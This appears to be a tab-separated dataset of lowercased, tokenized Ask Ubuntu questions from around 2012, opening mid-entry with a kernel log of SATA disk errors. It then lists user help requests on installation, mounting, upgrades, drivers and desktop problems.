: write fpdma queued [ 481.470650 ] ata5.00 : cmd 61/28:08:88:88 : e0/00:00 : e8:00:00/40 tag 1 ncq 20480 out [ 481.470651 ] res 51/84:28:00:00:00/84:00:00:00:00/40 emask 0x10 ( ata bus error ) [ 481.470654 ] ata5.00 : status : { drdy err } [ 481.470656 ] ata5.00 : error : { icrc abrt } [ 481.470658 ] ata5.00 : failed command : write fpdma queued [ 481.470662 ] ata5.00 : cmd 61/28:10:00:00:00/00:00:00:00:00/40 tag 2 ncq 20480 out [ 481.470663 ] res 51/84:28:00:00:00/84:00:00:00:00/40 emask 0x10 ( ata bus error ) [ 481.470665 ] ata5.00 : status : { drdy err } [ 481.470667 ] ata5.00 : error : { icrc abrt } [ 481.470671 ] ata5 : hard resetting link [ 481.470672 ] ata5 : nv : skipping hardreset on occupied port [ 481.936094 ] ata5 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 481.960135 ] ata5.00 : model number mismatch 'hitachi hds723020bla642 ' ! = 'tachi hds723020bla642 \xffffff80\x10' [ 481.960139 ] ata5.00 : revalidation failed ( errno=-19 ) [ 481.960144 ] ata5.00 : limiting speed to udma/133 : pio2 [ 486.936020 ] ata5 : hard resetting link [ 486.936024 ] ata5 : nv : skipping hardreset on occupied port [ 487.404034 ] ata5 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 487.412144 ] ata5.00 : n_sectors mismatch 3907029168 ! = 268435455 [ 487.412148 ] ata5.00 : old n_sectors matches native , probably late hpa lock , will try to unlock hpa [ 487.412151 ] ata5.00 : revalidation failed ( errno=-5 ) [ 487.412154 ] ata5.00 : disabled [ 492.404029 ] ata5 : hard resetting link [ 493.288057 ] ata5 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 493.296139 ] ata5.00 : failed to identify ( init_dev_params failed , err_mask=0x80 ) [ 498.288135 ] ata5 : hard resetting link [ 499.168100 ] ata5 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 499.176442 ] ata5.00 : ata-8 : hitachi hds723020bla642 , mn6oa800 , max udma/133 [ 499.176445 ] ata5.00 : 3907029168 sectors , multi 16 : lba48 ncq ( depth 31/32 ) [ 499.192263 ] ata5.00 : configured for udma/133 [ 499.192275 ] sd 4:0:0:0 : [ sdc ] result : hostbyte=did_ok driverbyte=driver_sense [ 499.192279 ] sd 4:0:0:0 : [ sdc ] sense key : aborted command [ current ] [ descriptor ] [ 499.192283 ] descriptor sense data with sense descriptors ( in hex ) : [ 499.192284 ] 72 0b 47 00 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 499.192292 ] 00 00 00 00 [ 499.192301 ] sd 4:0:0:0 : [ sdc ] add . sense : scsi parity error [ 499.192305 ] sd 4:0:0:0 : [ sdc ] cdb : read ( 10 ) : 28 00 00 00 01 00 00 00 08 00 [ 499.192313 ] end_request : i/o error , dev sdc , sector 256 [ 499.192316 ] quiet_error : 57 callbacks suppressed [ 499.192318 ] buffer i/o error on device sdc , logical block 32 [ 499.192327 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192330 ] sd 4:0:0:0 : killing request [ 499.192337 ] sd 4:0:0:0 : [ sdc ] result : hostbyte=did_ok driverbyte=driver_sense [ 499.192340 ] sd 4:0:0:0 : [ sdc ] sense key : aborted command [ current ] [ descriptor ] [ 499.192343 ] descriptor sense data with sense descriptors ( in hex ) : [ 499.192346 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192350 ] [ 499.192351 ] 72 0b 47 00 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 499.192358 ] 00 00 00 00 [ 499.192361 ] sd 4:0:0:0 : [ sdc ] add . sense : scsi parity error [ 499.192364 ] sd 4:0:0:0 : [ sdc ] cdb : write ( 10 ) : 2a 00 e8 e0 88 88 00 00 28 00 [ 499.192370 ] end_request : i/o error , dev sdc , sector 3907029128 [ 499.192372 ] buffer i/o error on device sdc , logical block 488378641 [ 499.192374 ] lost page write due to i/o error on sdc [ 499.192378 ] buffer i/o error on device sdc , logical block 488378642 [ 499.192380 ] lost page write due to i/o error on sdc [ 499.192382 ] buffer i/o error on device sdc , logical block 488378643 [ 499.192384 ] lost page write due to i/o error on sdc [ 499.192386 ] buffer i/o error on device sdc , logical block 488378644 [ 499.192388 ] lost page write due to i/o error on sdc [ 499.192391 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192394 ] buffer i/o error on device sdc , logical block 488378645 [ 499.192396 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192399 ] lost page write due to i/o error on sdc [ 499.192405 ] sd 4:0:0:0 : [ sdc ] result : hostbyte=did_ok driverbyte=driver_sense [ 499.192408 ] sd 4:0:0:0 : [ sdc ] sense key : aborted command [ current ] [ descriptor ] [ 499.192411 ] descriptor sense data with sense descriptors ( in hex ) : [ 499.192412 ] 72 0b 47 00 00 00 00 0c 00 0a 80 00 [ 499.192419 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192421 ] 00 00 00 00 [ 499.192424 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192427 ] 00 00 00 00 [ 499.192430 ] sd 4:0:0:0 : [ sdc ] add . sense : scsi parity error [ 499.192433 ] sd 4:0:0:0 : [ sdc ] cdb : write ( 10 ) : 2a 00 00 00 00 00 00 00 28 00 [ 499.192439 ] end_request : i/o error , dev sdc , sector 0 [ 499.192441 ] buffer i/o error on device sdc , logical block 0 [ 499.192442 ] lost page write due to i/o error on sdc [ 499.192447 ] buffer i/o error on device sdc , logical block 1 [ 499.192449 ] lost page write due to i/o error on sdc [ 499.192451 ] buffer i/o error on device sdc , logical block 2 [ 499.192453 ] lost page write due to i/o error on sdc [ 499.192466 ] buffer i/o error on device sdc , logical block 3 [ 499.192467 ] lost page write due to i/o error on sdc [ 499.192479 ] ata5 : eh complete [ 499.192498 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192503 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192507 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192510 ] sd 4:0:0:0 : [ sdc ] read capacity ( 16 ) failed [ 499.192512 ] sd 4:0:0:0 : [ sdc ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 499.192514 ] sd 4:0:0:0 : [ sdc ] sense not available . [ 499.192517 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192520 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192524 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192527 ] sd 4:0:0:0 : [ sdc ] read capacity failed [ 499.192528 ] sd 4:0:0:0 : [ sdc ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 499.192531 ] sd 4:0:0:0 : [ sdc ] sense not available . [ 499.192536 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192542 ] end_request : i/o error , dev sdc , sector 0 [ 499.192548 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192553 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192557 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192561 ] sd 4:0:0:0 : rejecting i/o to offline device [ 499.192564 ] sd 4:0:0:0 : [ sdc ] asking for cache data failed [ 499.192566 ] sd 4:0:0:0 : [ sdc ] assuming drive cache : write through [ 499.192571 ] sdc : detected capacity change from 2000398934016 to 0 [ 499.196063 ] ata5.00 : detaching ( scsi 4:0:0:0 ) [ 499.196142 ] sd 4:0:0:0 : [ sdc ] 3907029168 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 499.196352 ] sd 4:0:0:0 : [ sdc ] stopping disk [ 499.196989 ] sd 4:0:0:0 : [ sdc ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 499.196993 ] sdc : detected capacity change from 0 to 2000398934016 [ 499.197053 ] ldm_validate_partition_table ( ) : disk read failed . [ 499.197080 ] dev sdc : unable to read rdb block 0 [ 499.197122 ] sdc : unable to read partition table [ 499.871722 ] scsi 4:0:0:0 : direct-access ata hitachi hds72302 mn6o pq : 0 ansi : 5 [ 499.871907 ] sd 4:0:0:0 : attached scsi generic sg2 type 0 [ 499.871943 ] sd 4:0:0:0 : [ sdc ] 3907029168 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 499.871985 ] sd 4:0:0:0 : [ sdc ] write protect is off [ 499.871988 ] sd 4:0:0:0 : [ sdc ] mode sense : 00 3a 00 00 [ 499.872013 ] sd 4:0:0:0 : [ sdc ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 501.738525 ] sdc : [ 501.738749 ] sd 4:0:0:0 : [ sdc ] attached scsi disk
216462	how to install lightscribe for cd burning ?	if i want to install lightscribe for cd burning , how do i install it safely ? how to use simply use it ? how to install ? how to use it ? ( simple , quick way )
216465	backgrounds in menus ubuntu 12.10	i 'm having this little problem in all themes i install - the background color of all the window menu items is light-gray instead of the dark i expected . i 'm using ubuntu 12.10 and using gnome-config-tool to configure them . i 've installed all themes in the .themes folder in my home . using cinnamon and ubuntu 12.10 how can i solve it ?
216467	wubi wo n't install on windows	i have a friend who is looking at ubuntu and he wanted to install it as a windows app so he could easily uninstall it if he were not interested . he downloaded the ubuntu 12.04 64bit iso however the wubi loader told him to restart the computer with the disc in the tray . how do you install ubuntu in windows ?
216474	infinite loop in terminal	i have tried to connect my asus transformer 300t tablet ( android 4.1 ) to ubuntu 12.04 by following the steps in this tutorial . however something went wrong in this step ( i am not sure which exactly ) : you’re almost done ! now , restart your computer , and then run these three commands : echo “alias android-connect=\”mtpfs -o allow_other /media/galaxynexus\” '' > > ~/.bashrc echo “alias android-disconnect=\”fusermount -u /media/galaxynexus\” '' > > ~/.bashrc source ~/.bashrc and now my terminal is repeatedly showing non-stop ( seems like an infinite loop ) alias : command not found alias android-disconnect=”fusermount -u /media/transformert300t” this happens even after i restarted my computer . can anyone diagnose what is going wrong ? here is a screenshoot :
216478	how to get update-notifications when using gnome fallback on ubuntu precise pangolin ?	one of my friends is using gnome fallback ( activated by installing gnome-panel ) . problem is that he does not get notifications about updates anymore . well , we could set up automatic updates in the background , but this is not what we want . is there a way to get a notification about available updates in the notification-area ? thanks !
216483	can not mount usb drive -- fstab error	recently , one of my desktops seems to have developed a problem with the fstab and mounting usb drives . the specific error i receive is ... unable to mount traveldrive error mounting : mount exited with exit code 1 : helper failed with : unprivileged user can not mount ntfs block devices using the external fuse library . either mount the volume as root , or rebuild ntfs-3g with integrated fuse support and make it setuid root . please see more information at http : //tuxera.com/community/ntfs-3g-faq/ # unprivileged the contents of my fstab are ... /etc/fstab : static file system information . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # entry for /dev/sdc1 : uuid=7e3431cd-522f-4e35-b286-4300fa702d4a / ext4 errors=remount-ro 0 1 # entry for /dev/sda1 : uuid=60684d08684cde82 /media/archive ntfs-3g defaults , locale=en_us.utf-8 0 0 # entry for /dev/sdc5 : uuid=cd166221-4b1d-40f7-b9de-785208990587 none swap sw 0 0 /dev/sdd1 /media/sdd1 ntfs nls=iso8859-1 , ro , users , umask=000 , user 0 0 /dev/sdd5 /media/ps3 ( fat32 ) vfat users , user 0 0 /dev/sdd5 /media/sdd5 vfat uid=m3talhead , users , user 0 0 i 'm guessing its a problem with the duplicate /dev/sdd5 entries ( ? ) , but being the *nix noob i am , i 'm not certain . what am i missing ? any assist is greatly appreciated !
216490	step by step instructions to install dual-boot ubuntu 12.10 with windows 7	everytime i try to install ubuntu , i end up messing up something : ( i have a windows 7 machine . i want to dual boot this with ubuntu on it . 600 gb for windows ( i play games ; ) ) and 400 gb for ubuntu ( but i want to learn coding also : d ) now , what is the cleanest way ( step by step.. on the basics.. ) to install ubuntu with windows on it . how to partition.. grub.. etc ? ? thanks
216499	problem mounting internal floppy drive	this is the error i received when i tried mounting internal floppy drive : error mounting system-managed device /dev/fd0 : command-line `mount `` /media/floppy0 '' ' exited with non-zero exit status 32 : mount : /dev/fd0 is not a valid block device i 'm using ubuntu 12.10 .
216501	can not boot ubuntu after remove failed data disk ( system on different disk )	our ubuntu server has four hard disks , but we did n't make them a raid . yesterday , one of the disk was reported to be failing , and this disk was /dev/sdb and was mounted as /data ( was used to store data ) , but the server can not boot up after we remove this disk . we tried umount it or deleted it in the 'disk utility ' , but did n't work . is there any way to just remove this disk and avoid re-installing ubuntu ?
216506	how to integrate sympa ( mail list mgr ) with apache on ubuntu 12.04 or later ?	installed sympa on my ubuntu 12.10 system ( 'apt-get install -y sympa ' ) , rev 6.1.11 . ca n't get past web-server integration : http : //www.sympa.org/manual/web-interface # web_server_setup . have tried sudo + apache2 integration methods . http : ///wws and http : ///static-sympa still experiences permissions problems . seeking an ubuntu-specific procedure tailored to the 'sympa ' package . have yet to find anything . suspect i 'm not executing procedure properly and/or missing some `` small '' setp . alternatively : seeking means to simply `` sanity check '' the installation by granting apache2 ( www-data ) process `` all/unsecure '' rights to access anything , simply to ensure i 've got everything installed properly . then i can dial back to proper/secure permissions . thoughts ?
216510	i ca n't upgrade to 12.10 quantal quetzal	after hearing about some of the features in 12.10 , i decided to upgrade my ubuntu from 12.04 lts to the newer 12.10 . however , when i try to upgrade it , i start the update manager , like always , and i start the distro upgrade , just like i do every time there 's a new version , but at the end of the `` setting new software channels '' stage , it fails , saying : could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade : e : unable to correct problems , you have held broken packages . this can be caused by : upgrading to a pre-release version of ubuntu running the current pre-release version of ubuntu unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . what should i do ? i understand that i have some sort of `` broken '' package on my system , but how do i identify and remove the problem ? note : at the start of the `` setting new software channels '' stage , i was presented with this : third party sources disabled some third party entries in your sources.list were disabled . you can re-enable them after the upgrade with the 'software-properties ' tool or your package manager . ** update ** well , it was a real pain , but i actually re-downloaded the 12.04 iso , burned it to a cd ( my computer has decided to stop booting from usb , ) re-installed 12.04 , and immediately upgraded to 12.10 . i then went to sleep . when i got up in the morning , it seemed to be stalled on flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/adobe-flashplugin/adobe-flashplugin_11.2.202.251.orig.tar.gz . i checked my internet , but , aside from the occasional packet bursts that keep my computer connected to my wi-fi , there was no usage . i think that it has stalled somehow . okay , it was about an hour from the time i saw the error till the time i edited this . it 's been about an hour since . 2 hours stalling , plus any time that it has been doing this before i checked it - this is a serious problem . ( note : it already passed the `` point of no return , '' where it said that there will be no going back after this step has been completed . ) here 's a screenshot of what it 's doing : http : //imgur.com/nn6kf
216514	messed up path and ca n't login	i was screwing around and trying to add some environment variables to my path . i must have made a type or something because once i logged out , i could not lob back in . i know i 'm not on caps lock or anything and in fact if i type the wrong password i am informed of this . however , when i type the correct password the desktop starts to load and then loops back to the login prompt . there also no other users on the machine for me to log in as other than guest which does not have the right permissions for me to fix things . any ideas on where to go from here ?
216518	lubuntu sound icon not reopening	i am running ubuntu 12.04.1 with lubuntu and i am having an issue with the sound icon . when i open it and close it it will not open anymore . only when i restart my computer will it open again .
216520	what is the best way to bypass china firewall to allow ssh deploy @ **.com	i am trying to bypass the china firewall and allow ssh deploy @ **.com at the command console . this is because i need to test the games i wrote on apps.facebook.com/** . i tried vpn ( both pptp and openvpn ) , but they are n't that great as connection speed slows down significantly . since i am deploying the game in another site , my browser needs to download the game , which is super slow . what are ways of bypassing the firewall other than getting a vpn ? i was thinking maybe have a computer outside china and using teamviewer to access ...
216525	best looking linux distro but should be light weight	hey can you give me some names of the best looking linux distro but it should be a little bit light weight coz i have intel 845g on board graphics , p4 processor,1.25 gb ram ...
216528	how to know each tab memory usage ?	hi , is it possible to know that , if firefox or any browser is opened , whats the amount of memory taken up by each tab of web-browser ? i am just curious to know .
216536	enable wireless on an hp pavillion dv4	i am using ubuntu 12.04 on an hp pavillion dv4 and i can not get the wireless antenna turned on . i think i have the right drivers downloaded , but when i go into network > wireless i can not switch it to `` on '' ... it 's grey 'd out . the laptop has a soft switch for the antenna on the top of the keyboard , but that does not appear to work
216537	how to make cpu0 offline ?	i want to make cpu0 offline . i have dual core laptop . i can make cpu1 offline ( using offline file ) but ca n't make cpu0 offline . how to do this ?
216538	browsers not working properly in ubuntu 12.10	i have installed ubuntu 12.10 and none of the browsers are working properly . many of the webpages either take long time to load or will be rendered as just plain html text . also when i tried to install 'google-chrome ' it showed me this error '' the package is of bad quality - google chrome '' please help .
216539	pypar2 changed ?	in ubuntu 12.10 am checking compilations with pypar2 . but it changed from `` matrix of solomon '' to `` reed matrix of solomon '' . is system corrupted or am i spooking myself ?
216540	netbeans wo n't open filezilla files	i installed netbeans 7.2.1 for ubuntu 12.0.4 . when i connect via ftp to a site and click view/edit a file ( filezilla ) , netbeans is opened but without a file in it ( it only opens netbeans without opening the file ) . anyone had a similar issue ? could it be permission issue ?
216542	how can i change the frequency of the ram , and also know its value from ubuntu ?	i am using two modules of ram and i would like to know their frequency because at simple sight , i ca n't see any sign of it in the modules . when i ran memtest one time , it showed me the test settings ' values ( some related to the ram ) , but on subsequent runs it showed me another set of values ; values which i do n't understand because i have n't find a fair reasonable user guide . furthermore , i can not control the settings of memtest . the program , launched from grub 's menu , does not respond to keystrokes in a macbook pro with dual boot ( mac os and natty-amd64-mac ) . i would also like to know if the impossibility to control the program with the keyboard is normal in mac computers ? or i did something wrong during the installation ? . can i fix that ? . is it still like that in newer versions of ubuntu ? also : is there a way to change the frequency of the ram , like in the bios , in refit 's shell or grub ?
216546	display problem after installaling updates in ubuntu 12.04	i had installed ubuntu 12.10 yesterday but it was not working properly , so installed ubuntu 12.04 from live usb and after installation , it was working without harm , but problems arose when i installed updates , the screen is going weird if i launch dash home . i 've posted link of screen shot of my screen , hoping that this problem can be solved . http : //samsher.xtgem.com/pics/problem.png take a look at top of the screen , there you can see the problem . lspci -nn | grep vga output 00:0d.0 vga compatible controller [ 0300 ] : nvidia corporation c61 [ geforce 7025 / nforce 630a ] [ 10de:03d6 ] ( rev a2 )
216547	match regular expressions for exclude list in deja-dup	it appears deja-dup does not accept regular expressions when adding entries via dconf-editor to org.gnome.dejadup.exclude-list . is there a solution to allow for regex matching of paths for this parameter ?
216549	mounted disk suddenly became readonly	while running ubuntu , sometimes my disks suddenly become read-only , and any write attempt on it result in error : read-only file system , but mount -l shows that disk as rw . after restarting , some failures are detected in disk and fsck fix the problem , but after a while all of this happens again . what is the cause of this situation and how it can be fixed permanently ?
216552	what ubuntu applications run on the nexus 7 ?	can we really use all ubuntu applications on nexus 7 when ubuntu core has been installed on it ? or should we recompile all apps to arm architecture ?
216554	fern-wifi-cracker `` exec format error '' breaks packaging system	root @ cunix : /home/cunix # sudo apt-get remove fern-wifi-cracker reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libqt4-test libqt4-sql-mysql mysql-common libqt4-xmlpatterns libqt4-help python-qt4 python-sip libqt4-sql-sqlite libqt4-sql macchanger libqt4-designer libmysqlclient16 python-scapy libqt4-scripttools use 'apt-get autoremove ' to remove them . the following packages will be removed : fern-wifi-cracker 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 3,514kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 167661 files and directories currently installed . ) removing fern-wifi-cracker ... dpkg ( subprocess ) : unable to execute installed pre-removal script ( /var/lib/dpkg/info/fern-wifi-cracker.prerm ) : exec format error dpkg : error processing fern-wifi-cracker ( -- remove ) : subprocess installed pre-removal script returned error exit status 2 errors were encountered while processing : fern-wifi-cracker e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how to uninstall ?
216555	windows 8 , disabled uefi but there is more trouble	i 'm attempting to install ubuntu 12.10 on a new dell inspiron 15z ultrabook , that shipped with windows 8 . when i boot from disc ( with verified checksums ) it works ok , and the try ubuntu button works , but when i go to install it crashes upon trying to view the partitions on the disc . is this related to the newish nature of windows 8 ? i 'm trying to decide if i need a different computer instead .
216561	card reader read speed is slow	background info : my hard drive recently failed and i have n't had the money/time to replace it . i tried a live version of ubuntu from a thumb drive and decided i liked it , so in the meantime i 've decided to install 12.04 to a sd card and run it from there . i 've spent about a week working on drivers , customization , and basic exploration , scouring google for answers and learning from my mistakes , but a couple of items i could not find any good information on so i 've decided to suck it up and ask . problem ( s ) : i started out installing to a microsd card ( within an adapter ) simply because i had one , but it was running quite slow . i purchased an ultra sdhc card ( 16 gb ) because it boasted a 30 mb/s read speed and installed ubuntu 12.04 to it . this sped things up a bit . however , i 'm still getting only ~20 mb/s read speed maximum , and 11 mb/s read speed on average . is this typical for these media readers ? i 've tried benchmarking the drive on ubuntu 12.10 as well , and also while running the os from a liveusb drive ( so the card reader was n't in use during testing ) . these all had similar results . is this typical of these card readers or the cards themselves ? i have no way of testing the drive in windows or in any other setting . could this be a driver issue ? also , my computer seems to dislike booting from the card reader . it will boot from it just fine ( i 'm running ubuntu from it right now ) , but no matter how many times i update the bios it seems to forget about the card reader altogether , so i have to always boot using the boot options menu . about 1/4 of the time , the reader wo n't even show up , though a quick restart and return to boot options always resolves the issue . this is regardless of the fact that there is literally nothing else to boot from . lastly , the computer will not fully wake up from sleep . you can hear it start up , but the screen remains blank no matter how long i wait . this happens every time i allow to go into sleep mode ( as opposed to only some of the time ) . it has never awoken from sleep . below , i hope , is any information you might need : per the gateway support page for my laptop , the card reader is an rts5117 . it is not listed on realtek 's website under products ( though they do list an rts5116 ) . running lsusb in the terminal , the device identifies as : bus 001 device 004 : id 0bda:0158 realtek semiconductor corp. usb 2.0 multicard reader disk utility displays the drive with the following info : `` generic multicard reader '' , firmware version : 1.0 , device : /dev/sda , connection : usb at 480.0 mb/s the laptop is a gateway t-1625 . here are the motherboard specifications , where it shows the card reader model . i would provide more links but i 've hit the link limit . the card i 'm using is the 16gb sandisk ultra sdhc class 10 memory card . on the website it is item # sdsdu-016g . ( i 've hit the link limit or i would provide one . ) this is the windows vista driver recommended by gateway , in case that can provide any information . i 'm aware that i grouped a few problems into one thread , but i thought that they may be related . if they are not i can update the post accordingly . my main problem is the read/write speed of the card reader . the booting is only an annoyance and i can disable sleep if needed . thanks for your help . if you need any additional information just ask and i will update my post .
216563	optimus dilemma	i plan to buy a customized laptop in a week . my main os on the system would the latest version of ubuntu . almost all the laptops i am interested in , seem to come with nvidia optimus and i am well aware that optimus and ubuntu do n't play nice with each other . i would simply like to know what can i expect if i get a customized laptop with nvidia optimus and install ubuntu on it . would i be able to use the intel graphcis card for most of my work and switch to the card only when i need to ? would i be able to switch off the nvidia card when i do n't need it , to save on power ? would i be better off installing ubuntu 12.04 and bumblebee or ubuntu 12.10 and prime ? and finally , should i even bother buying a laptop with optimus ?
216566	midnight commander is showing some weird characters	i have no idea why this happens , how do i fix it ?
216567	is there any way to re-organise the global application menu ?	in any application in unity , the main menu for the application that has focus gives the options of 'file ' , 'edit ' , 'view ' , 'go ' , bookmarks ' , 'help ' , etc . - just like windows does . while this makes sense for anyone who 's used a computer for years , it is not very intuitive - especially the first two ( file and edit ) . i 'd like to know if the options in this menu can be re-organised . for example , 'file ' should perhaps be renamed to 'application ' , because the sub-menu items like 'new folder ' ( in nautilus ) and 'quit ' affect the entire application . 'preferences ' and 'about ' should be in that menu too by this logic . the 'edit ' menu could be renamed 'file ' , and have all options that affect whatever item is selected ( or whichever tab or document view is opened ) in the application , such as 'copy ' , 'paste ' , and 'print ' . the 'properties ' item should be in that menu as well .
216569	menu does n't work in libreoffice 3.6	translated ( using google translate ) : i have a problem with libreoffice and menu bar . i have installed ubuntu 12.10 and i find that when i open a libreoffice file does not exit the menu by hovering the title bar . i think it 's a bug and reported . opening a new file and then open the document that comes with it . i would appreciate it if you solved this problem would tell me how to fix it . thank you . original : tengo un problema con libreoffice y su barra de menús . tengo instalada la distribución ubuntu 12.10 y me encuentro que cuando abro un fichero de libreoffice no sale el menú al pasar el ratón por la barra de título . creo que es un bug ya reportado . abriendo un fichero nuevo y luego abriendo el documento consigo que salga . agradecería que cuando esté solucionado este problema me dijerais como solucionarlo . gracias .
216570	ubuntu 12 installation problem	i have made about 30 copies of the ubuntu installation cd , but there is no way to install it on my laptop . i get a black screen with a blinking cursor or i get a /casper/vmlinuz file not found or i get invalid or corrupt kernel image . i tried all solutions that i found but no way to install ubuntu on this laptop . i tried both 32 bit and 64 bit versions , i tried ubuntu 11 , and no way to install it . only if i install windows first and than can i install it with wubi . but that is not an ideal solution . that is linux installed on windows . if i install any other distributions of linux the installation works ok . so there must be some issue with ubuntu !
216571	ubuntu 12.10 stuck in incomplete upgrade state	i started upgrade from ubuntu 12.04 to ubuntu 12.10 x64 . all of a sudden , the upgrade process stops due to extra.ubuntu.com being unreachable . any attempts to resume the process did n't give any results . the attempts were as follows : 1. sudo apt-get -f install 2. sudo dpkg -- configure -a 3. sudo rm -rf /var/lib/apt/lists sudo apt-get clean sudo apt-get autoremove sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade in all cases , the process dpkg -- config libc6 : amd64 stopped working due to too many errors , because 13 packages have wrong versions ( below than required ) and such files can not be configured and thus upgraded . each attempt to upgrade them caused the stop of dpkg configuration process due to broken dependencies . synaptic does n't help as well as it runs the same upgrade process . is there any way to remove such broken dependencies ? at the moment the system shows that this is ubuntu 12.10 . if i run sudo dpkg -- configure -a i get as result many pages with error messages , but the last part is as follows : dpkg : too many errors , stopping errors were encountered while processing : - texlive-base - texlive-doc-base - rhythmbox-plugins - rhythmbox - texlive-binaries - texlive-extra-utils - rhythmbox-mozilla - rhythmbox-plugin-magnatune - libc6 : amd64 - libc6 : i386 - libglib2.0-cil - rhythmbox-plugin-zeitgeist - monodevelop-versioncontrol - libdee-1.0-4 - libmono-posix4.0-cil - libgee2 : amd64 - libcolord1 : amd64 - libhunspell-1.3-0 : amd64 - libglib2.0-cil-dev - rhythmbox-plugin-cdrecorder - libfontenc1 : amd64 - cpio - libmono-system2.0-cil - pulseaudio - xserver-xorg-video-ati - xserver-xorg-video-siliconmotion - dconf-service - libmono-system-data-linq2.0-cil - libmono-sqlite2.0-cil - libapr1 - policykit-1 - libmono-system-drawing4.0-cil - gconf-defaults-service - xserver-xorg-input-vmmouse - libexempi3 : amd64 - libgtkspell0 - libgtk2.0-cil-dev - libbonoboui2-0 : amd64 - libclutter-1.0-0 : amd64 - libmono-system-windows-forms4.0-cil - libjson-glib-1.0-0 : amd64 - libpth20 - mono-runtime - libsocket6-perl - libart-2.0-2 : amd64 - libpam-cap : amd64 - libpoppler28 : amd64 - libjavascriptcoregtk-1.0-0 - gvfs-bin - libmono-system-data2.0-cil - libmono-system-web4.0-cil processing was halted because there were too many errors . i realized that i did n't put the essential part of the log which states the fact that all such modules can not be configured as because broken dependencies - packages , aforementioned packages depend on have old versions , from ubuntu 12.04 . i added the list in the log as i do n't know how better place each package name on a string .
216578	how can i make the pc make a 'beep ' sound when network cable is unplugged ?	how can i make beep sound in the pc when the network cable is unplugged or no network available to any specific interface such as eth0 or eth1 ? follow up : $ sudo apt-get install beep $ cat /etc/modprobe.d/blacklist.conf | grep 'pcspkr' blacklist pcspkr $ sudo vim /etc/modprobe.d/blacklist.conf # blacklist pcspkr : wq $ sudo modprobe pcspkr $ beep
216579	can not authorise facebook with gwibber	i am running ubuntu 12.04 . i am fairly newbie so answers in words of one sylabel pls . when trying to add facebook to gwibber i get the following message.any ideas pls . twitter works fine . unable to load page problem occurred while loading the url https : //graph.facebook.com/oauth/authorize ? scope=publish_stream % 2cread_stream % 2cstatus_update % 2coffline_access % 2cuser_photos % 2cfriends_photos & redirect_uri=http % 3a % 2f % 2fwww.facebook.com % 2fconnect % 2flogin_success.html & type=user_agent & display=popup & client_id=71b85c6d8cb5bbb9f1a3f8bbdcdd4b05 can not resolve proxy hostname ( )
216588	command line volume control amixer has problems with muting	because my laptop volume controls are state of the art in the field of bad usability , i decided to map two keyboard shortcuts to make my own volume controls . i found that amixer should be helpful : super+arrow up amixer set master playback 2db+ super+arrow down amixer set master playback 2db- this works , but if i turn the volume too low , i can not take it back . it stays muted and my `` volume up '' command does nothing . when i try these commands in terminal , it gives following outputs : $ amixer set master playback 2db- simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 64 mono : playback 4 [ 6 % ] [ -45.00db ] [ on ] $ amixer set master playback 2db- simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 64 mono : playback 1 [ 2 % ] [ -47.25db ] [ on ] $ amixer set master playback 2db- simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 64 mono : playback 0 [ 0 % ] [ -99999.99db ] [ on ] and now it is broken . following does nothing : $ amixer set master playback 2db+ simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 64 mono : playback 0 [ 0 % ] [ -99999.99db ] [ on ] i have to use my mouse , grab volume toggle on my panel and raise it manually . the value [ -99999.99db ] looks suspicious , but i have no idea what does it mean . could anyone adjust my two volume commands they could avoid such issue ?
216589	wolfram mathematica on ubuntu 12.10 : no window focus on help browser	the help browser of wolfram mathematica is not getting window focus when clicked on it . clicking links or buttons in the help browser works without the window focus , but copying code from or typing in it does n't . i can get window focus on the help browser by using the alt+tab or the window menu though . switching focus between notebooks behaves normally . i 'm running mathematica 8.0.4.0 on ubuntu 12.10 . mathematica is the only software that has this behavior . has anyone else experienced this behavior or know a solution to it ? p.s . question posted on mathematica.stackexchange.com too .
